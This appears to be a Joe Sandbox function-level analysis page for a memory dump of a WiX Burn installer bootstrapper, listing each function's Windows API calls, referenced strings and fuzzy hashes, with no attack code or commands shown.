Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CriticalSection$CompareEnterErrorLastLeaveString
String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
API String ID: 2716280545-445000439
Opcode ID: 31170a135eb0f448f2d1b2952f9fe0a1e4b608e4424e49825c37d7bf8c2acbf1
Instruction ID: 90ec512c240eb051ac460725708897ab2e7d73c137f8f2114c0ee388e35b2e52
Opcode Fuzzy Hash: 31170a135eb0f448f2d1b2952f9fe0a1e4b608e4424e49825c37d7bf8c2acbf1
Instruction Fuzzy Hash: CD51F471A40226A7DF309F29DD4AF6B3FA8FB95750F10051BF8045A386C271DD44CAE1

Function 005A2C1C Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 299COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000001,006C0064,000000FF,002C002B,000000FF,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 005A2C8A

Strings

Failed to add dependent bundle provider key to ignore dependents., xrefs: 005A2DF4
Failed to add registration action for self dependent., xrefs: 005A2F57
Failed to add self-dependent to ignore dependents., xrefs: 005A2D0E
Failed to allocate registration action., xrefs: 005A2CF3
Failed to create the string dictionary., xrefs: 005A2CC3
Failed to add dependents ignored from command-line., xrefs: 005A2D3F
Failed to check for remaining dependents during planning., xrefs: 005A2E30
crypt32.dll, xrefs: 005A2CD5, 005A2DCF, 005A2EC4, 005A2F39
Failed to add registration action for dependent related bundle., xrefs: 005A2F8E
wininet.dll, xrefs: 005A2ED7

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CompareString
String ID: Failed to add dependent bundle provider key to ignore dependents.$Failed to add dependents ignored from command-line.$Failed to add registration action for dependent related bundle.$Failed to add registration action for self dependent.$Failed to add self-dependent to ignore dependents.$Failed to allocate registration action.$Failed to check for remaining dependents during planning.$Failed to create the string dictionary.$crypt32.dll$wininet.dll
API String ID: 1825529933-1705955799
Opcode ID: 19772639520d925a20de27e286e9d68da6805a0b249c1cc073e527ede985bb97
Instruction ID: acb8ee30e843d8e110f24b447c3c68a7aeebb50ff1c8c750e4661cd0d4b21a77
Opcode Fuzzy Hash: 19772639520d925a20de27e286e9d68da6805a0b249c1cc073e527ede985bb97
Instruction Fuzzy Hash: FCB17D70A00216EFDF299F68C846AAEBFB5FF46710F00816AF815AB251D730D991DB91

Function 005AF90B Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 187COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 005AF947
UuidCreate.RPCRT4(?), ref: 005AFA2A
StringFromGUID2.OLE32(?,?,00000027), ref: 005AFA4B
LeaveCriticalSection.KERNEL32(?,?), ref: 005AFAF4

Strings

userForApplication.cpp, xrefs: 005AFA60
Failed to set update bundle., xrefs: 005AFACE
update\%ls, xrefs: 005AF9A3
Failed to default local update source, xrefs: 005AF9B7
Failed to recreate command-line for update bundle., xrefs: 005AFA12
Failed to convert bundle update guid into string., xrefs: 005AFA6A
Failed to create bundle update guid., xrefs: 005AFA37

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CriticalSection$CreateEnterFromLeaveStringUuid
String ID: userForApplication.cpp$Failed to convert bundle update guid into string.$Failed to create bundle update guid.$Failed to default local update source$Failed to recreate command-line for update bundle.$Failed to set update bundle.$update\%ls
API String ID: 171215650-2594647487
Opcode ID: e59c21d57532f5ecb211fa428a8f82843c7cd43c3c5ba227662c42833d4d41d6
Instruction ID: 5d5e392a84170dbb58ccda9adcda783878456850d2b5c3a5bea1c6649fbc65a2
Opcode Fuzzy Hash: e59c21d57532f5ecb211fa428a8f82843c7cd43c3c5ba227662c42833d4d41d6
Instruction Fuzzy Hash: 29617831A40219AFDF219FE4C849EAEBFB5FB49710F15417AF908AB252D7719800DB91

Function 00594AE5 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 144windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00594C64
PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00594C75

Strings

Failed to set action variables., xrefs: 00594BC4
WixBundleLayoutDirectory, xrefs: 00594BF5
Failed to set layout directory variable to value provided from command-line., xrefs: 00594C06
Failed to create the message window., xrefs: 00594B98
Failed to query registration., xrefs: 00594BAE
Failed to check global conditions, xrefs: 00594B49
Failed while running , xrefs: 00594C2A
Failed to set registration variables., xrefs: 00594BDE
Failed to open log., xrefs: 00594B18

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: MessagePostWindow
String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
API String ID: 3618638489-3051724725
Opcode ID: 7a90eba830834c410e75070ab0139a0f09cf0f5fbb5dcf22aaad3d92ca9b76cf
Instruction ID: 3616a705cfdceacadf8e58f20faa78a3a4a2031d2fc0d2edb3c9796f95a34b10
Opcode Fuzzy Hash: 7a90eba830834c410e75070ab0139a0f09cf0f5fbb5dcf22aaad3d92ca9b76cf
Instruction Fuzzy Hash: FF41B53160161BFFDF266A64CD49FBABE5EFB05750F014616F80496250EB60ED12AFD0

Function 005AF051 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 125COMMON

Download Yara Rule

APIs

Part of subcall function 0059394F: GetProcessHeap.KERNEL32(?,000001C7,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593960
Part of subcall function 0059394F: RtlAllocateHeap.NTDLL(00000000,?,00592274,000001C7,00000001,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593967

EnterCriticalSection.KERNEL32(?,00000014,00000001), ref: 005AF06E
LeaveCriticalSection.KERNEL32(?), ref: 005AF19B

Strings

userForApplication.cpp, xrefs: 005AF17C
Failed to post launch approved exe message., xrefs: 005AF186
Failed to copy the id., xrefs: 005AF100
user is active, cannot change user state., xrefs: 005AF089
Failed to copy the arguments., xrefs: 005AF12D
UX requested unknown approved exe with id: %ls, xrefs: 005AF0CE

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CriticalHeapSection$AllocateEnterLeaveProcess
String ID: user is active, cannot change user state.$userForApplication.cpp$Failed to copy the arguments.$Failed to copy the id.$Failed to post launch approved exe message.$UX requested unknown approved exe with id: %ls
API String ID: 1367039788-528931743
Opcode ID: 7f67ba22d77f7a89a6270858dc47b7119b9bb984a6b3cdb1df02288e6438860f
Instruction ID: 9dbe43212a708b1eb459ca26bb5192a42871d8cdcc1440e6e9af550dbe42af52
Opcode Fuzzy Hash: 7f67ba22d77f7a89a6270858dc47b7119b9bb984a6b3cdb1df02288e6438860f
Instruction Fuzzy Hash: 5E31A036A41226EBDB219FA4DC49E5E7FA8BF15720F024526FD04EB251EB31ED00D7A0

Function 005A969D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 102fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,005AA7D4,00000000,00000000,00000000,?,00000000), ref: 005A96B8
GetLastError.KERNEL32(?,005AA7D4,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 005A96C6

Part of subcall function 005D4102: Sleep.KERNEL32(?,00000000,?,005A85EE,?,?,00000001,00000003,000007D0,?,?,?,?,?,?,00594DBC), ref: 005D4119

CloseHandle.KERNEL32(00000000,00000000,00000001,00000003,000007D0,?,00000000,00000000,00000000), ref: 005A97A4

Strings

Failed to move %ls to %ls, xrefs: 005A977C
Failed to copy %ls to %ls, xrefs: 005A9792
Moving, xrefs: 005A973A
cache.cpp, xrefs: 005A96EA
Failed to open container in working path: %ls, xrefs: 005A96F5
%ls container from working path '%ls' to path '%ls', xrefs: 005A974F
Failed to verify container hash: %ls, xrefs: 005A9727
Copying, xrefs: 005A9743, 005A974E

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLastSleep
String ID: %ls container from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$cache.cpp
API String ID: 1275171361-1187406825
Opcode ID: 445aed20537af33b8f48535d5f8ab35b4058d615d1b1bcd41c013b4928804d78
Instruction ID: 2a63b7d73878043dd38fb4e1ceac412a051805515f5691f5ed07b6e315d3d124
Opcode Fuzzy Hash: 445aed20537af33b8f48535d5f8ab35b4058d615d1b1bcd41c013b4928804d78
Instruction Fuzzy Hash: 4F212676A41275BBE63219199C4AF7F2E58FF97B60F110116FE00BE2C0D7629D0096F1

Function 00596F85 Relevance: 18.2, APIs: 2, Strings: 10, Instructions: 227COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00596FB2
LeaveCriticalSection.KERNEL32(?), ref: 005971BE

Strings

Failed to set variable., xrefs: 00597192
Failed to read variable included flag., xrefs: 005971AE
Unsupported variable type., xrefs: 00597184
Failed to read variable value as number., xrefs: 00597178
Failed to read variable value type., xrefs: 005971A0
Failed to read variable value as string., xrefs: 0059718B
Failed to set variable value., xrefs: 00597171
Failed to read variable count., xrefs: 00596FD2
Failed to read variable literal flag., xrefs: 00597199
Failed to read variable name., xrefs: 005971A7

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to read variable count.$Failed to read variable included flag.$Failed to read variable literal flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable value.$Failed to set variable.$Unsupported variable type.
API String ID: 3168844106-528957463
Opcode ID: 7a59c98221665690bdad4b0ac527738083485b4e4334ab656cbca85db3404dad
Instruction ID: ff553ccea4964ce692135c81eb0b05d4075add1d08512d54d557594a63eab92b
Opcode Fuzzy Hash: 7a59c98221665690bdad4b0ac527738083485b4e4334ab656cbca85db3404dad
Instruction Fuzzy Hash: 5F718F72C1421EABDF21DEA4CD45EAEBFB9FB88710F104567F900A6250D7309E50EBA0

Function 005D44D1 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000080,00000000,?,?,00000000,?,00000000,?,?,?), ref: 005D4550
GetLastError.KERNEL32 ref: 005D4566
GetFileSizeEx.KERNEL32(00000000,?), ref: 005D45BF
GetLastError.KERNEL32 ref: 005D45C9
SetFilePointer.KERNEL32(00000000,?,?,00000001), ref: 005D461D
GetLastError.KERNEL32 ref: 005D4628
ReadFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,00000001), ref: 005D4717
CloseHandle.KERNEL32(?), ref: 005D478A

Strings

fileutil.cpp, xrefs: 005D44F1, 005D45A8, 005D45E9, 005D476D

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: File$ErrorLast$CloseCreateHandlePointerReadSize
String ID: fileutil.cpp
API String ID: 3286166115-2967768451
Opcode ID: 655336aeb35c8fba65933e7f41a0ca5941e8de7b1cf27df5e952f82f34c90671
Instruction ID: dd0cd550139e9c8da77e30b42f0b9550715063b665ef598431490f2835e1cf4e
Opcode Fuzzy Hash: 655336aeb35c8fba65933e7f41a0ca5941e8de7b1cf27df5e952f82f34c90671
Instruction Fuzzy Hash: 2C811036A40226EBDF318E6D9C45B6E2EA8FB41760F11452BFD06EB380E774CD009E90

Function 00592DBF Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 203sleepfiletimeCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 00592E5F
GetLastError.KERNEL32 ref: 00592E69
GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00592F09
CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00592F96
GetLastError.KERNEL32 ref: 00592FA3
Sleep.KERNEL32(00000064), ref: 00592FB7
CloseHandle.KERNEL32(?), ref: 0059301F

Strings

%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 00592F66
4#v, xrefs: 00592E5F
pathutil.cpp, xrefs: 00592E8D

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
String ID: 4#v$%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
API String ID: 3480017824-1777530710
Opcode ID: 0cdf9715180345deb2075f9c4dfe7ba4a6870ecf3693eb5987b01d76ec44c7c8
Instruction ID: 2d8bfe791f0571e7e56d94b1e34ace943540cee728b206f8f38b0b3a22b3d2d4
Opcode Fuzzy Hash: 0cdf9715180345deb2075f9c4dfe7ba4a6870ecf3693eb5987b01d76ec44c7c8
Instruction Fuzzy Hash: 40714372D01129EBDF319B98DC8DBAEBBB9BB18710F110196FA14A7290D7349E80DF50

Function 005D6D50 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 165COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,label,000000FF,?,?,?,7622DFD0,?,005D72C8,?,?), ref: 005D6DA6
SysFreeString.OLEAUT32(00000000), ref: 005D6E11
SysFreeString.OLEAUT32(00000000), ref: 005D6E89
SysFreeString.OLEAUT32(00000000), ref: 005D6EC8

Strings

term, xrefs: 005D6DD9
scheme, xrefs: 005D6DB9
`Dv, xrefs: 005D6E11, 005D6E89, 005D6EC8
label, xrefs: 005D6D98

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: String$Free$Compare
String ID: `Dv$label$scheme$term
API String ID: 1324494773-22456348
Opcode ID: 8cd8a1e1bf5250f14b563de9a0e47e1d32fb7f3edb9c5988f552130879675f44
Instruction ID: 7df7393b2f14673d863cffcc5eaef95457083d642dc4805d2c70f392b32ce262
Opcode Fuzzy Hash: 8cd8a1e1bf5250f14b563de9a0e47e1d32fb7f3edb9c5988f552130879675f44
Instruction Fuzzy Hash: 27515D35901219EFDB25DB98C848FAEBFB9FF04711F11029BE511A62A0DB309E05EB50

Function 005A4D8D Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 122COMMON

Download Yara Rule

APIs

UuidCreate.RPCRT4(?), ref: 005A4DC0
StringFromGUID2.OLE32(?,?,00000027), ref: 005A4DEF
UuidCreate.RPCRT4(?), ref: 005A4E3A
StringFromGUID2.OLE32(?,?,00000027), ref: 005A4E66

Strings

Failed to allocate pipe name., xrefs: 005A4E2F
Failed to create pipe guid., xrefs: 005A4DCD
Failed to convert pipe guid into string., xrefs: 005A4E0C
pipe.cpp, xrefs: 005A4E00, 005A4E4D
Failed to allocate pipe secret., xrefs: 005A4E8F
BurnPipe.%s, xrefs: 005A4E1B

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CreateFromStringUuid
String ID: BurnPipe.%s$Failed to allocate pipe name.$Failed to allocate pipe secret.$Failed to convert pipe guid into string.$Failed to create pipe guid.$pipe.cpp
API String ID: 4041566446-2510341293
Opcode ID: 42b5c305e3b528d2a1832066744e7d4767f44e12ec93b51b0ea1dcecb008796a
Instruction ID: 0a4c648dc7ef2c90b8c603b2cdc2b436d8446854c1ce14ea002783bde325de73
Opcode Fuzzy Hash: 42b5c305e3b528d2a1832066744e7d4767f44e12ec93b51b0ea1dcecb008796a
Instruction Fuzzy Hash: A8417B72D01309ABDF20DBE5C909EDEBBFCBB85710F200526E905AB240D7B49905CFA1

Function 005AEA7D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101threadCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,0059548E,?,?), ref: 005AEA9D
GetLastError.KERNEL32(?,0059548E,?,?), ref: 005AEAAA
CreateThread.KERNEL32(00000000,00000000,005AE7B4,?,00000000,00000000), ref: 005AEB03
GetLastError.KERNEL32(?,0059548E,?,?), ref: 005AEB10
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,0059548E,?,?), ref: 005AEB4B
CloseHandle.KERNEL32(00000000,?,0059548E,?,?), ref: 005AEB6A
CloseHandle.KERNEL32(?,?,0059548E,?,?), ref: 005AEB77

Strings

Failed to create the UI thread., xrefs: 005AEB3B
Failed to create initialization event., xrefs: 005AEAD5
uithread.cpp, xrefs: 005AEACB, 005AEB31

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
API String ID: 2351989216-3599963359
Opcode ID: fa949a9a8896c9a77bbbd9401cdbd243b5d52b6ee0ec910041362faa6fa79d0c
Instruction ID: 02b62be1c13d59a986e81d845cc724eee280bc5f89d421e1230c6a6992ad3e02
Opcode Fuzzy Hash: fa949a9a8896c9a77bbbd9401cdbd243b5d52b6ee0ec910041362faa6fa79d0c
Instruction Fuzzy Hash: BE317476D01229FBDB10DF998D8AA9EBFA8FF05750F11016AF905F7240E6309E0096A1

Function 005AE645 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 97threadCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,00000000,?,?,0059548E,?,?), ref: 005AE666
GetLastError.KERNEL32(?,?,0059548E,?,?), ref: 005AE673
CreateThread.KERNEL32(00000000,00000000,005AE3C8,00000000,00000000,00000000), ref: 005AE6D2
GetLastError.KERNEL32(?,?,0059548E,?,?), ref: 005AE6DF
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,0059548E,?,?), ref: 005AE71A
CloseHandle.KERNEL32(?,?,?,0059548E,?,?), ref: 005AE72E
CloseHandle.KERNEL32(?,?,?,0059548E,?,?), ref: 005AE73B

Strings

splashscreen.cpp, xrefs: 005AE694, 005AE700
Failed to create modal event., xrefs: 005AE69E
Failed to create UI thread., xrefs: 005AE70A

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
String ID: Failed to create UI thread.$Failed to create modal event.$splashscreen.cpp
API String ID: 2351989216-1977201954
Opcode ID: f6c1ff441d8f724d1135b41421a98309b9f4ea2883331cf68375e4dc87d6b8bc
Instruction ID: 7b3ac54d531f91ee81b55b9b0e704fb11f43e97944644863a99b6abf03eb4039
Opcode Fuzzy Hash: f6c1ff441d8f724d1135b41421a98309b9f4ea2883331cf68375e4dc87d6b8bc
Instruction Fuzzy Hash: 7031A476D0122ABBDB219B99DC069AFBFB8FB55750F11456BFD10F7240E7305E008AA0

Function 005B14E1 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,76232F60,?,?,00595405,005953BD,00000000,00595445), ref: 005B1506
GetLastError.KERNEL32 ref: 005B1519
GetExitCodeThread.KERNEL32(005DB488,?), ref: 005B155B
GetLastError.KERNEL32 ref: 005B1569
ResetEvent.KERNEL32(005DB460), ref: 005B15A4
GetLastError.KERNEL32 ref: 005B15AE

Strings

cabextract.cpp, xrefs: 005B1540, 005B1590, 005B15D5
Failed to reset operation complete event., xrefs: 005B15DF
Failed to wait for operation complete event., xrefs: 005B154A
Failed to get extraction thread exit code., xrefs: 005B159A

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
API String ID: 2979751695-3400260300
Opcode ID: b56013ba21ac40c82a89eb7cd64c334b2918c04654eb303f4aafb08eb2109aed
Instruction ID: c389a5740e16f5fd10ab27b54a8659b8edaff02a24fe95622d33947aefc126fb
Opcode Fuzzy Hash: b56013ba21ac40c82a89eb7cd64c334b2918c04654eb303f4aafb08eb2109aed
Instruction Fuzzy Hash: 1A31C871A01605EBEB209FA68D15AEE7FF8FB44700B50416BF946D61A0E730EA00AF65

Function 005B15FE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 82synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(005DB478,?,00000000,?,0059C1D3,?,005953BD,00000000,?,005A784D,?,0059566D,00595479,00595479,00000000,?), ref: 005B161B
GetLastError.KERNEL32(?,0059C1D3,?,005953BD,00000000,?,005A784D,?,0059566D,00595479,00595479,00000000,?,00595489,FFF9E89D,00595489), ref: 005B1625
WaitForSingleObject.KERNEL32(005DB488,000000FF,?,0059C1D3,?,005953BD,00000000,?,005A784D,?,0059566D,00595479,00595479,00000000,?,00595489), ref: 005B165F
GetLastError.KERNEL32(?,0059C1D3,?,005953BD,00000000,?,005A784D,?,0059566D,00595479,00595479,00000000,?,00595489,FFF9E89D,00595489), ref: 005B1669
